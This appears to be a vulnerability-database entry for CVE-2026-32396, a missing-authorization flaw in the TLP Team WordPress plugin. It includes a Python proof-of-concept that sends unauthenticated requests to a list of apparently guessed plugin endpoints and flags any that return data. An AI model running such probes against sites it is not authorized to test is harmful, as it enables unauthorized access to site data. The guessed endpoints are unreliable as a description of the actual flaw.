Security Vulnerability Report
中文
CVE-2026-32396 CVSS 5.3 MEDIUM

CVE-2026-32396

Published: 2026-03-13 19:54:55
Last Modified: 2026-04-29 10:17:05

Description

Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Team: from n/a through <= 5.0.13.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

TLP Team插件 <= 5.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32396 PoC - Missing Authorization in TLP Team Plugin # This PoC demonstrates the broken access control vulnerability import requests import sys def test_vulnerability(target_url): """ Test for Missing Authorization vulnerability in TLP Team plugin """ # Common endpoints that might be affected endpoints = [ '/wp-admin/admin-ajax.php?action=tlp_team_get_members', '/wp-admin/admin-ajax.php?action=tlp_team_get_single_member', '/wp-json/tlp-team/v1/members', '/wp-json/tlp-team/v1/team-data', '/?tlp_team_action=single-member&id=1', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32396 - Missing Authorization in TLP Team Plugin") print("=" * 60) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) print(f" Status Code: {response.status_code}") # Check if we get sensitive data without auth if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'json' in content_type or response.text.startswith('{') or response.text.startswith('['): print(f" [!] VULNERABLE: Endpoint returned JSON data without authentication") print(f" Response preview: {response.text[:200]}...") else: print(f" [?] Endpoint accessible, content type: {content_type}") elif response.status_code == 401 or response.status_code == 403: print(f" [+] Protected: Endpoint requires authentication") else: print(f" [*] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f" [!] Error: {e}") print("\n[*] Testing complete") print("[*] Note: This PoC checks for accessible endpoints. Manual verification may be needed.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com") sys.exit(1) target = sys.argv[1] test_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32396", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:55.320", "lastModified": "2026-04-29T10:17:05.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Team: from n/a through <= 5.0.13."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en RadiusTheme Team tlp-team permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Team: desde n/a hasta &lt;= 5.0.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tlp-team/vulnerability/wordpress-team-plugin-5-0-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}